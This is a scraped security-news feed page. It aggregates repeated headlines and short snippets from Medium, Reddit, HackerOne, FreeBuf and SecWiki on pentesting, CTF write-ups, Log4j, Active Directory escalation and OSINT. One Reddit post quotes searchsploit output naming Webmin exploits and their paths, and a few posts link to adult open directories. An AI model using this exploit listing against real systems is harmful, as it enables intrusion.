    ODDZ Incentivized Testnet : Airdrop And Bug Bounty Program
    Oddz Finance’s Options V1 Already Live On Binance Smart Chain Mainnet And Completed Testnet On Polygon Matic Chain. Continue reading on Medium »  ( 1 min )
    COOKIES: AN EYE-OPENING GUIDE
    Cookies are tiny pieces of data or information that are locally stored on your computer that are sent to the server when you make a request Continue reading on Medium »  ( 2 min )
    COOKIES: AN EYE-OPENING GUIDE
    Cookies are tiny pieces of data or information that are locally stored on your computer that are sent to the server when you make a request Continue reading on Medium »  ( 2 min )
    IDOR — TryHackme
    Writeup on Access Control Continue reading on InfoSec Write-ups »  ( 2 min )
    Mintverse Beta 2.0 Bug Bounty Program
    Dear Mintverse community, Continue reading on Mintverse »  ( 2 min )
    Bug Bounty Methodology - Web Vulnerabilities Checklist
    Hello guys, it’s me again. I know malware analysis might be boring because of debugging and code analysis especially for the people who… Continue reading on Medium »  ( 2 min )
    Starting My Journey
    Hi Welcome to Bug University, I welcome you all to my blog site… Continue reading on Medium »
    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Admin Login Bypass in a Coaching system
    Hello readers I am Aditya , Recently hunting around in a coaching site I found a critical bug at… Continue reading on Medium »  ( 1 min )
  • Open

    Red Team vs Blue Team: entenda a diferença
    Como em um time de futebol, temos o ataque e a defesa, em cibersegurança a ideia é parecida. Continue reading on Yaman Tecnologia »  ( 2 min )
    OFFENSIVE SECURITY TOOLS FOR PENTESTING & RED TEAM OPERATIONS
    Every so often I post a tweet on Twitter asking for people’s arsenal of different tools whether for security, coding or whatever. Continue reading on Medium »  ( 1 min )
  • Open

    Prototype pollution via console.table properties
    Node.js disclosed a bug submitted by rugvip: https://hackerone.com/reports/1431042
  • Open

    Kernel ROP gadgets ARM
    Hello guys, I am trying to port a kernel exploit and i need to find rop gadgets from vmlinux. This is not accessible in the target and as far as i understand uboot loads the vmlinux on boot, but this restricts me from easily finding the gadgets i need. Is there any resource you can suggest as I'm clearly missing something and my resesrch till now didn't give me clear answers. Thanks :D submitted by /u/Cr0wTom [link] [comments]  ( 1 min )
    Wfuzz VS ffuf - Which one is the faster web fuzzing tool? [Web Security #1]
    submitted by /u/pat_ventuzelo [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-11 Review
    基于跨站跳转和文本数据异构图的GCN模型实现恶意网站识别 by ourren 在互联网交换中心检测反射放大 DDoS 攻击 by Avenger 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-11 Review
    基于跨站跳转和文本数据异构图的GCN模型实现恶意网站识别 by ourren 在互联网交换中心检测反射放大 DDoS 攻击 by Avenger 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Career growth and related certification
    I've been working as a security tester (pentester) for about a year. I've done CEH V10 and this year I really want to be improved bling on my resume tbh. I am currently doing web mobile pos testing. Your help would be really appreciated in suggesting good value for money and information certificates. I know OSCP is there but I need more hands on for that which I am working on but in the mean time don't want to lose time. I have a potential interest in cloud security but also open to other fields and certification. submitted by /u/light_striker12 [link] [comments]  ( 2 min )
    Tips for making malware lab for school project
    Going to use https://github.com/ytisf/theZoo malwares. Maybe use Splunk to write alerts, queries etc to identify the malwares. (Problem is that it only got 60 days trial, need at least for 6 months) Should I be worried for VM escape, if I run these malware in a secure VM environment? What should be the main focus of this project. Run the malware then just identify them with alerts and write writeups? Would this idea be great for a university project for 6 months? submitted by /u/PapiPoseidon [link] [comments]  ( 3 min )
    Strange log activity
    Has anyone ever seen windows event 1102 (The audit log was cleared) activity on a windows server that was performed by SYSTEM? It happened on a test vm I built and I can't figure out why that would happen. I have backups of the logs and compared the logs on the server with the backup and a few 100 logs were deleted but they were future dated logs (which doesn't make sense). I'm sure the it's not a timezone issue, the logs were dated 15 hours into the future. Almost like they were a mistake and the system fixed it? I have basically nothing running on the server (something I built for testing) but would love to understand what happened. Thanks! submitted by /u/forthebeer2000 [link] [comments]  ( 1 min )
    How to remove root certificates from work
    I recently started a new job at a government facility with a BYOD policy at work. Without thinking, I used my personal phone and logged in to the wifi which required me to accept root certificates. I am now aware that all my traffic can be decrypted and anything on my personal phone can be monitored on any network. I wish to keep my personal privacy and use a separate device for work now. How can I reset my phone to remove the root certificates? As I understand it, a standard factory reset may not work if the cert provided superuser permissions. Would a stock ROM install remove the root cert? submitted by /u/lloptty774 [link] [comments]  ( 1 min )
  • Open

    Invicti Security Names Jeff Bray Chief Financial Officer
    Invicti Security today announced seasoned financial executive Jeff Bray has joined the company as Chief Financial Officer. Bray brings decades of experience leading world-class finance teams in both private and public software companies and will lead all aspects of Invicti’s financial operations. READ MORE  ( 2 min )
  • Open

    Real or Fake? How to Spoof Email
    I briefly mentioned how easy it is to forge email sender addresses in a previous blog post that described the steps I took to determine whether a suspicious email was legitimate or a phishing attempt. In this post, we will take a deeper dive into why email sender addresses are so easy to forge and... The post Real or Fake? How to Spoof Email appeared first on TrustedSec.  ( 14 min )
  • Open

    Domain Escalation - ShadowCoerce [MS-FSRVP]
    submitted by /u/netbiosX [link] [comments]
    Generating & Analyzing Shellcode with Radare2
    submitted by /u/DLLCoolJ [link] [comments]  ( 1 min )
  • Open

    关于我学渗透的那档子事之Java反序列化-CB链
    这篇文章严格来说是我学java利用链的部分学习笔记。  ( 1 min )
    一篇关于PHP反序列化的文章
    一篇关于php反序列的文章  ( 1 min )
    FreeBuf 早报 | 多名 EA Sports FIFA 22玩家被黑;电子垃圾也是网络安全问题
    几名EA Sports FIFA 22的玩家疑似遭受黑客攻击,声称失去了对其个人EA和电子邮件账户的访问权限。  ( 1 min )
    专访阿里云SASE负责人:让办公安全更简单
    SASE是否真能实现Gartner预测的“可取代现有的网络和安全模型”,阿里云SASE是如何打造的,又能为企业带来哪些改变?  ( 1 min )
    欧洲刑警组织被勒令删除与犯罪调查无关的数据
    1月3日,欧洲数据保护监督机构要求欧洲刑警组织删除所存储的与刑事调查无显著关联的大量个人数据信息。
    多名EA Sports FIFA 22玩家被攻击
    越来越多的EA Sports FIFA 22玩家报告称他们的 EA 帐户被黑,无法访问他们的个人EA和电子邮件帐户,其中包括知名主播。  ( 1 min )
    Facebook推出“隐私中心”,教育用户了解数据收集和隐私选项
    迷宫般的菜单和晦涩的措辞,使人们不得不怀疑其在用户数据保护方面的有效性。  ( 1 min )
    “免疫”与“病毒”在网络时空之下的博弈对抗
    网络风险与“零号病人”同样,都是动态的研究课题,没那么容易一击即中,需要在寻找、判断、肯定、和自我否定中循序渐进,就是对“病毒”的认知过程。
    “脆弱”的车联网
    和快速奔跑的车联网产业相比,车联网安全显然是一个水磨工夫的活,车企必须学会慢下来,沉下去,方能真正解决车联网的安全问题。  ( 1 min )
    2021年挖矿木马趋势报告
    深信服威胁情报团队基于云端数据持续对活跃挖矿木马家族进行追踪,检测到了多起挖矿木马爆发事件,并从中分析总结出了一些挖矿木挖马的发展趋势。  ( 1 min )
    从我国现有法律法规谈重要数据定义
    2021年结束了,年底回忆了一下这一年来自己做了些什么,印象最深的应该就是数据安全这个词。  ( 1 min )
  • Open

    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
  • Open

    My Pentest Log -1 -
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
  • Open

    InCTF pro finals 2021: Look deeper writeup
    Hello Hackers!!! I am back with another forensic write-up this time. InCTF professionals finals 2021 happened this week. Challenges were…  ( 3 min )
    [Day 1] Web Exploitation Save The Gifts | Advent of Cyber 3 (2021)
    Very excited for Advent of Cyber 3, because I have trouble with Advent of Cyber 2, lol.  ( 2 min )
    Make a USB Rubber Ducky with less than $3
    USB Rubber Ducky is like USB flash drive, but it’s different. Because it will inject keystrokes with some payload to hack your computer…  ( 3 min )
    Log4j Exploitation Walkthrough(CVE-2021–44228) — INE Labs
    Software developers use the Log4j framework to record user activity and the behavior of applications for subsequent review. Here is how…  ( 3 min )
    Day 8 CN- TCP/UDP #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    InCTF pro finals 2021: Look deeper writeup
    Hello Hackers!!! I am back with another forensic write-up this time. InCTF professionals finals 2021 happened this week. Challenges were…  ( 3 min )
    [Day 1] Web Exploitation Save The Gifts | Advent of Cyber 3 (2021)
    Very excited for Advent of Cyber 3, because I have trouble with Advent of Cyber 2, lol.  ( 2 min )
    Make a USB Rubber Ducky with less than $3
    USB Rubber Ducky is like USB flash drive, but it’s different. Because it will inject keystrokes with some payload to hack your computer…  ( 3 min )
    Log4j Exploitation Walkthrough(CVE-2021–44228) — INE Labs
    Software developers use the Log4j framework to record user activity and the behavior of applications for subsequent review. Here is how…  ( 3 min )
    Day 8 CN- TCP/UDP #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    InCTF pro finals 2021: Look deeper writeup
    Hello Hackers!!! I am back with another forensic write-up this time. InCTF professionals finals 2021 happened this week. Challenges were…  ( 3 min )
    [Day 1] Web Exploitation Save The Gifts | Advent of Cyber 3 (2021)
    Very excited for Advent of Cyber 3, because I have trouble with Advent of Cyber 2, lol.  ( 2 min )
    Make a USB Rubber Ducky with less than $3
    USB Rubber Ducky is like USB flash drive, but it’s different. Because it will inject keystrokes with some payload to hack your computer…  ( 3 min )
    Log4j Exploitation Walkthrough(CVE-2021–44228) — INE Labs
    Software developers use the Log4j framework to record user activity and the behavior of applications for subsequent review. Here is how…  ( 3 min )
    Day 8 CN- TCP/UDP #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    Lot Of IT-Related Books.
    https://doc.lagout.org/ submitted by /u/AdministrativeDig391 [link] [comments]  ( 1 min )

  • Open

    Trying to find a way to see when a user account that is now deleted, was first created. Is that possible?
    So the HDD , which ran XP, doesn’t boot anymore. I can access the files however. I’m trying to find a when a specific account was created on this drive. It was created from the original admin account , which also was deleted and replaced later on. . The user account files of the first admin account were saved , but nothing of the account that I’m looking for. The guest account is still the same guest account with files from when it used to be mine. So it wasn’t factory reset or anything. Am I out of luck for figuring out when the deleted account I’m looking for was created? submitted by /u/Pubh12 [link] [comments]  ( 2 min )
    Deleted texts in an iTunes backup
    Hi all, I believe I already know the answer to a hypothetical scenario but I wanted some clarity on deleted texts via an iTunes backup. From a general perspective, say a user has a modern iPhone and deleted hundreds of text messages then backed up their iPhone using iTunes. Would some or even most of those deleted texts be found in the backup? I realize time and usage of the iPhone would effect what may get backed up, but let’s say they deleted a bunch of texts then created the iTunes backup right after. I imagine since the entire sms.db is getting backed up, the texts marked for deletion would still reside in the database / get backed up. Thanks in advance. submitted by /u/hotsausce01 [link] [comments]  ( 2 min )
  • Open

    Active Directory Privilege Escalation (CVE-2021–42278)
    This post discusses how CVE-2021-42287 allows potential attackers to gain high privileged user access (domain controllers Administrator level access) via a low privileged user (any The post Active Directory Privilege Escalation (CVE-2021–42278) appeared first on Hacking Articles.  ( 4 min )
  • Open

    Active Directory Privilege Escalation (CVE-2021–42278)
    This post discusses how CVE-2021-42287 allows potential attackers to gain high privileged user access (domain controllers Administrator level access) via a low privileged user (any The post Active Directory Privilege Escalation (CVE-2021–42278) appeared first on Hacking Articles.  ( 4 min )
  • Open

    What is an SS7 attack and how does it work?
    I made the post about the IMSI Catchers and someone brought this up. submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
    I clicked a phishing scam link.. can I get rid of the program it downloaded on my iPhone?
    I clicked a link in a text it downloaded something on my phone that I can’t find. My iPhone can’t make calls now.. I double clicked my home button during a call and something glitched.. I saw an app open that is not showing on my phone, it was transparent and said “screen sharing”. I wasn’t able to go into the app then it disappeared. I’m 99% sure someone can see everything I do on my iPhone. Do I need to go to T-Mobile and get a new phone? Edit: every time I make a call it fails and the speaker/audio button is always not able to be selected. But the speaker button will turn on then call fails. Here is a picture of the screen sharing: https://imgur.com/a/HjsY767 submitted by /u/Acrobatic-Path2242 [link] [comments]  ( 2 min )
    remote network pentest connectivity
    Hello Netsec engineers, ​ I have an 'internal' remote pentest coming up for a client who doesn't have a spare computer in their office or a virtual computer. They would like to simulate an attack as if someone walked into the office and dropped a raspberry pi. ​ I have a laptop ready for deployment that will be connected via lan in the clients office, what would be the best way for me to remote into the laptop? In the past I've used Team viewer but that hasnt been great display wise, the reliability never dropped though which is the most important. ​ Would it be worth getting a VPS and configuring my own VPN using openvpn for tests like this? submitted by /u/HotHeadStayingCold [link] [comments]  ( 4 min )
    SANS SEC560 (Network Penetration Testing and Ethical Hacking) Preparation?
    My job is offering to pay for a SANS training of my choice. I passed the SEC401 earlier this year but I have no experience with penetration testing or anything of the sort. I realize I'll have to fill some information gaps myself to get the most out of this course. Where should I start? Thanks in advance. submitted by /u/Lorian-onii-chan [link] [comments]  ( 1 min )
    Another Microsoft account has established ownership of number message?
    got this message was I hacked? or is there something I am missing Another Microsoft account has established ownership of 12176. If you no longer own 121176, we can help you set up another sign-in name the next time you sign in to your Microsoft account. If 12176 still belongs to you, we can help you reclaim it. I cut out the number just in case I actually had this number at one point but what does this mean. I already suspect my brother is behind this because we are at war and he has accessed my Gmail constantly, and I just removed a few devices from my Gmail because it said I had a MacBook which I don't and he's in the IT field, and has google nest in our house he bought for our mother I'm thinking he's manipulating that to steal my credentials as well but I'm not sure. So long story short I cleaned up all possible security breaches my chump brother might have had control over and this happens I'm thinking he was on my Microsoft account because he jumps in my online COD Lobbys with lame attempts to insult me lol submitted by /u/TheGoodJosh [link] [comments]  ( 1 min )
    Best way to inspect IoT device traffic?
    I also suppose the biggest challenge would be getting the devices to trust a self signed certificate. submitted by /u/earthlyaeon [link] [comments]  ( 1 min )
  • Open

    Another MSX directory.
    http://www.msxarchive.nl/pub/msx/ submitted by /u/EmuAnon34 [link] [comments]
    micro bikini oil dance collection
    http://www.wo-fd.xyz/?/Microbikini%20Oily%20Dance%20Ultimate%20Collection%20%5BOmega%20P%5D/ ​ And a butt load more xxx up 1 directory https://preview.redd.it/446vp7vpkta81.png?width=1920&format=png&auto=webp&s=964e053e72ab80490463e4acdb150f24b59acfec submitted by /u/Hyp3rionX [link] [comments]
    xxx od
    http://107.178.111.146:9999/ gay porn submitted by /u/Hyp3rionX [link] [comments]
  • Open

    Abusing terminal emulators with ANSI escape characters can lead to remote DDoS, character injection and more.
    submitted by /u/jat0369 [link] [comments]  ( 1 min )
    Domain Escalation – sAMAccountName Spoofing
    submitted by /u/netbiosX [link] [comments]
    ProtonVPN TCP Accleration SYN+ACK Spoofing Analysis
    submitted by /u/netsecfriends [link] [comments]  ( 2 min )
  • Open

    Domain Escalation – sAMAccountName Spoofing
    submitted by /u/netbiosX [link] [comments]
    Must-Have Tools For Hacking
    submitted by /u/banginpadr [link] [comments]
  • Open

    FTC Says Fix Log4j Security Vulnerability or Face Its Wrath
    Article URL: https://thenewstack.io/ftc-says-fix-log4j-security-vulnerability-or-face-its-wrath/ Comments URL: https://news.ycombinator.com/item?id=29879106 Points: 3 # Comments: 0
    New macOS vulnerability, “powerdir,” could lead to unauthorized user data access
    Article URL: https://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access/ Comments URL: https://news.ycombinator.com/item?id=29879030 Points: 5 # Comments: 0  ( 11 min )
  • Open

    Chrome 98 Beta: Color Gradient Vector Fonts, Region Capture Origin Trial, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 98 is beta as of January 10, 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android.  COLRv1 Color Gradient Vector Fonts In this version Chrome supports COLRv1 color gradient vector fonts as an additional new font format. A color font contains glyphs with multiple colors in them, which can be for example an emoji or a country flag or a multi-colored letter. COLRv1 is an evolution of the COLRv0 font format intended to make color fonts widespread on the web. COLRv1 fonts bring expressive visua…
  • Open

    OSINT Challenge — find the mural
    I have stumbled upon the Twitter account of OSINTDojo and their challenge to find a certain mural along with the respective artist… Continue reading on Medium »  ( 2 min )
    TryHackMe — OhSINT Walkthrough
    OhSINT is a free room on the TryHackMe platform. The objective of this challenge is to use open-source intelligence techniques to obtain… Continue reading on Medium »  ( 2 min )
  • Open

    FTC words of warning: Remediate recent Log4j vulnerabilities or face consequences
    The FTC has issued a warning to companies straggling behind on Log4j: remediate this flaw or face legal consequences. Here’s what you need to know. READ MORE  ( 3 min )
  • Open

    SecWiki News 2022-01-10 Review
    SecWiki周刊(第410期) by ourren Rootkit 系列研究-Windows平台的高隐匿、高持久化威胁 by ourren 2021年侵犯个人信息十大典型案例 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-10 Review
    SecWiki周刊(第410期) by ourren Rootkit 系列研究-Windows平台的高隐匿、高持久化威胁 by ourren 2021年侵犯个人信息十大典型案例 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    「网安知识大陆」1.0正式上线!
    能将优质内容聚集成一站式的「网安知识大陆」1.0正式版应运而生。
    FreeBuf早报 | 公安部公布个人信息犯罪十大典型案例;Facebook 推出隐私中心
    全国公安机关全年共破获侵犯公民个人信息案件9800余起,抓获犯罪嫌疑人1.7万名,并公布了2021年侵犯公民个人信息犯罪十大典型案例。  ( 1 min )
    实战SNMP服务攻击
    交换机安全配置中的SNMP服务  ( 1 min )
    「收藏版」大盘点:2021年政策法规、国标、报告白皮书
    本文全面整理了2021年出台的国内主要政策法规、部分国家标准以及主要机构的研究报告、白皮书等。  ( 1 min )
    漫话:等级保护之三员管理
    系统管理员、审计管理员、安全管理员不能集于一人之身,最好是三人分别担任。
    《上海市反间谍安全防范条例》发布,2022年1月1日正式施行
    《上海市反间谍安全防范条例》共七章三十五条,进一步完善了反间谍安全防范法律体系,依法维护国家安全。
    Night Sky,一种针对企业的新型勒索软件
    近日,安全研究人员发布警告称,一个名为“Night Sky”的新型勒索软件正再活跃,它以企业网络为目标,并在双重勒索攻击中窃取数据。  ( 1 min )
    在线预订服务平台 FlexBooker超370万账户数据遭泄露
    FlexBooker 建议用户保持警惕,并审查账户报表和信用报告中的可疑交易。  ( 1 min )
    Gin-Vue-admin垂直越权漏洞与代码分析-CVE-2022-21660
    用户之所以有机会越权,最终还是在代码上存在逻辑问题。  ( 3 min )
    因违反隐私规则,法国向谷歌和脸书开出2.1亿欧元巨额罚单
    法国分别对Facebook和谷歌处以1.5亿欧元和6000万欧元的罚款,理由是它们没有向用户提供拒绝cookie跟踪技术的简单选项。  ( 1 min )
    逆向分析教程(三)——快速查找指定代码的四种方法
    调试代码的时候,main()函数并不是直接位于可执行文件的EP位置上,出现在此的是开发工具(Visual C++)生成的启动函数。  ( 1 min )
    逆向分析教程(一)——调试代码
    该系列文章以准备入门逆向的小伙伴为对象进行总结。快来一起学习吧!  ( 1 min )
  • Open

    Domain Escalation – sAMAccountName Spoofing
    Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack… Continue reading → Domain Escalation – sAMAccountName Spoofing  ( 9 min )
    Domain Escalation – sAMAccountName Spoofing
    Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack… Continue reading → Domain Escalation – sAMAccountName Spoofing  ( 9 min )
  • Open

    Domain Escalation – sAMAccountName Spoofing
    Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack… Continue reading → Domain Escalation – sAMAccountName Spoofing  ( 9 min )
    Domain Escalation – sAMAccountName Spoofing
    Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack… Continue reading → Domain Escalation – sAMAccountName Spoofing  ( 9 min )
  • Open

    CTF Write-Up: StackOverflow
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi,  ( 2 min )
    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guys are doing well, Here is the story of how I am able to crash anyone’s Mozilla firefox by just sending a single email…  ( 2 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time.  ( 3 min )
    Day5 CN-Subnetting #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    CTF Write-Up: StackOverflow
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi,  ( 2 min )
    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guys are doing well, Here is the story of how I am able to crash anyone’s Mozilla firefox by just sending a single email…  ( 2 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time.  ( 3 min )
    Day5 CN-Subnetting #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    CTF Write-Up: StackOverflow
    CTF challenge available at ctf-mystiko.com.  ( 2 min )
    HOW I GOT MY FIRST RCE WHILE LEARNING PYTHON
    Hi,  ( 2 min )
    HOW I AM ABLE TO CRASH ANYONE’S MOZILLA FIREFOX BROWSER BY SENDING AN EMAIL
    Hi, Hope you guys are doing well, Here is the story of how I am able to crash anyone’s Mozilla firefox by just sending a single email…  ( 2 min )
    A TALE OF 5250$ : HOW I ACCESSED MILLIONS OF USER’S DATA INCLUDING THEIR NATIONAL ID’S
    Hi, Hope you guys are doing well, And a Happy New Year, YAY! ✨, Let’s start the blog without wasting more time.  ( 3 min )
    Day5 CN-Subnetting #100DaysofHacking
    Day1 : Installing Kali Linux  ( 4 min )
  • Open

    Exploiting Execute After Redirect (EAR) vulnerability in HTB Previse
    Exploiting Execute After Redirect for fun and profit?? Continue reading on InfoSec Write-ups »  ( 2 min )

  • Open

    searchsploit vs msfconsole exploit names
    Hi! Let's say I am looking for some webmin exploit through searchsploit: searchsploit webmin ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | cgi/webapps/23535.txt phpMyWebmin 1.0 - 'target' Remote File Inclusion | php/webapps/2462.txt phpMyWebmin 1.0 - 'window.php' Remote File Inclusion | php/webapps/2451.txt Webmin - Brute Force / Command Execution | multiple/remote/705.pl webmin 0.91 - Directory Traversal | cgi/remote/21183.txt Webmin …  ( 2 min )
    I've read about IMSI catchers being a security threat, but I'm not sure I should actually be worried about them. If someone grabbed an IMSI# with an IMSI catcher, how would they get any usable information about me? Is my personal information at risk or is this just a random unusable string to most?
    The paper that drew this to my attention: https://arxiv.org/pdf/1510.07563.pdf Corresponding article: https://arstechnica.com/information-technology/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/ In the paper, it claims that they can pull IMSI and IMEI off of smartphones, but I see no claim of knowing what the number or name of the phone is. If all they have is an IMSI and IMEI, am I really at risk? Is is usable information to have these numbers to a person who is undefined. Like, if someone stole my gmail password without knowing who I was or my account name, they could try it in every gmail account starting at a@gmail.com, but that might take a long time. Right? So the question is basically, is there actually a danger present in having my IMSI and IMEI accessed due to either the release of the information itself or in that there might be a way to connect it to me that I'm not aware of? I tried looking through Wikipedia for an answer. It's either not there or I'm too dumb. Either way I'd appreciate help in my paranoid quest for knowledge if any Redditors would be kind enough to offer it. tl;dr: What can an IMSI catcher know? & What can the operator do with that information? submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Looking for resources on detection engineering
    Hi there, I am trying to develop myself in detection engineering, have you got any interesting resources on the topic? Cheers submitted by /u/zakibros [link] [comments]  ( 1 min )
    I know that Stingrays can capture IMSI #s from nearby smartphones. Can they also capture phone numbers and personal data too or is it just the serial number?
    I know the authorities might have a database, but let's say a hacker picked up my smartphone with an IMSI catcher. They really know nothing right? Because they can't extract anything useful from that, right? Is that true or am I being naive. I read a paper that claimed that the extraction of IMSIs from smartphones was a security threat, but without a phone number, it doesn't seem all that useful to them. Article: https://arstechnica.com/information-technology/2015/10/low-cost-imsi-catcher-for-4glte-networks-track-phones-precise-locations/ Paper: http://go.redirectingat.com/?id=100098X1555750&xs=1&url=http%3A%2F%2Farxiv.org%2Fabs%2F1510.07563&sref=rss submitted by /u/anon314159265358p [link] [comments]  ( 3 min )
    how does a malware call back using DGA DNS?
    I was reading more into solarwinds hack and I noticed that the malware called back home using a DHA DNS algorithm, but I'm struggling to understnad how did they hackers know which domain to buy/use for their malware? based on the article: https://en.wikipedia.org/wiki/Domain_generation_algorithm I can understand how the malware generates the domain names but how does c2 and malware meet at a certain domain name? Especially if the malware generates 50k domains ? submitted by /u/ak_z [link] [comments]  ( 3 min )
    OK what’s the Reddit hack to wear you can’t send a private message because it thinks you have over 100 letters of tax this is currently going on I was banned for some thing I have no clue of why trying to figure this out
    submitted by /u/itwasEMOTIONALmurder [link] [comments]
  • Open

    Scanning millions of domains and compromising the email supply chain of Australia's most respected institutions
    submitted by /u/Jumpy_Resolution3089 [link] [comments]  ( 1 min )
  • Open

    Scanning millions of domains and compromising the email supply chain of Australia's most respected institutions
    submitted by /u/Jumpy_Resolution3089 [link] [comments]  ( 2 min )
  • Open

    Authentication Bypass & ATO
    Hi guys this is Karthik. I hope you all are doing good. I’m back with another interesting write-up “Authentication Bypass which leads to… Continue reading on Medium »  ( 1 min )
    Get your own Hacking VPS for free in 2022!!
    Introduction Continue reading on Medium »  ( 3 min )
    Host Header Injection Lead To Account Takeover
    Hello amazing hacker, Today, I want to talk about one of my finding in private pentest program that lead me takeover other user account by… Continue reading on Medium »  ( 2 min )
    PHP Type Juggling Vulnerability
    بِسْمِ ٱللَّٰهِ ٱلرَّحْمَٰنِ ٱلرَّحِيمِ Continue reading on Medium »
    STORED XSS
    Hello Everyone, Continue reading on Medium »  ( 2 min )
    2FA bypass by reading the documentation
    This is a fairly simple and short writeup, but i think is worth sharing, so lets get started. Continue reading on Medium »  ( 1 min )
  • Open

    blog/wp-json/wp/v2/users FILE is enable it will used for bruteforce attack the admin panel at blog/wp-login.php
    Mail.ru disclosed a bug submitted by kassem_s94: https://hackerone.com/reports/1403302
  • Open

    Subpoenaed iPhone and delay in turning it over to police--general outline of what can be lost in this delay?
    Ongoing case with Alec Baldwin and on set shooting that resulted in death. Phone was subpoenaed in mid December, still hasn't been turned over. Link to subpoena in comments. Cell carrier is Verizon. By delaying, I would think anything he has deleted will be much harder to recover, since the memory will be overwritten? Any general information or thoughts would be appreciated. submitted by /u/bbsittrr [link] [comments]  ( 3 min )
    Forensic computers
    Does anyone have experience with Siforce forensic workstations? How do they compare to Sumuri Talinos? submitted by /u/HorseAdministrative7 [link] [comments]  ( 2 min )
  • Open

    Hear No Evil: An Introduction to Audio File Analysis for OSINT
    It’s a new year, and that also means new blog posts about all things OSINT and Digital Forensics. In this one, we’re going to dive into… Continue reading on Medium »  ( 5 min )
    Certified in Open Source Intelligence (C|OSINT) Review
    Certification for OSINT Professional Continue reading on Medium »  ( 1 min )
  • Open

    SecWiki News 2022-01-09 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-09 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Attacktive Directory — Exploitation of Vulnerable Domain controller [TryHackMe]
    99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? Continue reading on System Weakness »  ( 8 min )
    Attacktive Directory — Exploitation of Vulnerable Domain controller [TryHackMe]
    99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller? Continue reading on Medium »  ( 7 min )
  • Open

    potato journal articles
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
    submitted by /u/soupcreamychicken [link] [comments]

  • Open

    Differential Fuzzing for Smart Contract VMs
    Article URL: https://github.com/fgsect/NeoDiff Comments URL: https://news.ycombinator.com/item?id=29857384 Points: 2 # Comments: 0  ( 2 min )
    Smart Contract VM Bugs via Differential Fuzzing [pdf]
    Article URL: https://raw.githubusercontent.com/fgsect/NeoDiff/main/roots21-2.pdf Comments URL: https://news.ycombinator.com/item?id=29850086 Points: 2 # Comments: 0  ( 119 min )
  • Open

    My OD full of japanese music and more.
    http://193.104.197.109/ submitted by /u/Connor_CZ [link] [comments]
  • Open

    From email to Github accounts
    While searching lately for new OSINT techniques on Github, I have found an old repository entitled “enumerate-github-users” by antnks. Continue reading on Medium »  ( 1 min )
    Understanding Web Fuzzing for Ethical Hacking
    Websites have unique addresses just like your home address known as a Uniform Resource Locator (URL). If multiple entities shared one… Continue reading on Medium »  ( 2 min )
    Weaponizing Information: To the Agitator Go the Spoils of OSINT
    *Note: This article was originally published by the author on March 9, 2020. Continue reading on Medium »  ( 5 min )
    The OSINT-ification of Job Boards: Hunting the Hunters
    *Note: This article was originally published by the author on July 2, 2019. Continue reading on Medium »  ( 11 min )
    How I Used OSINT to Find an Abandoned Hotel
    Continue reading on Medium »  ( 3 min )
    Applying OSINT Tactics to Twitter
    Allow me to begin by stating that the accounts (and tasks) depicted in this article were created for the purpose of OSINT education… Continue reading on Medium »  ( 3 min )
  • Open

    Unpacking CVE-2021-40444: A Deep Technical Analysis of an Office RCE Exploit
    submitted by /u/dmchell [link] [comments]
    Windows Process Listing using NTQuerySystemInformation
